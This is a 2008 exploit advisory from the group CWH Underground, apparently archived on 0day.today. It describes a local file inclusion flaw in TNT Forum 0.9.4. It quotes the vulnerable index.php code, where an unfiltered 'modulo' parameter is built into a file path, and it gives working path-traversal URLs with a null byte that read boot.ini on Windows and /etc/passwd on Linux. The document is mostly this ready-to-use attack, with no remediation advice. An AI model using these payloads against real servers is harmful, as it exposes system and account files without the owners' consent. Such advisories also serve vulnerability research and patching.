id: 3153
date: 06/09/2008
title: TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
author: CWH Underground
cves: 

====================================================
TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
====================================================



======================================================
 TNT Forum 0.9.4 Local File Inclusion Vulnerabilities
======================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE : 10 June 2008


#####################################################
 APPLICATION : TNT Forum
 VERSION     : 0.9.4
 DOWNLOAD    : download.tntforum.tuttoeniente.net
#####################################################

---LFI---

#################################################################
Vulnerable in index.php:

   137:	//Variabili generali
   138:	$modulo = @$_GET['modulo'];
   139:	$modfile = 'mod_'.$modulo.'.php';
#################################################################

Exploit:

[+] For Windows
http://[Target]/[tntforum_path]/index.php?modulo=../../../../../../../../boot.ini%00

[+] For Linux
http://localhost/tntforum/index.php?modulo=../../../../../../../../etc/passwd%00


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################




#  0day.today [2023-03-25]  #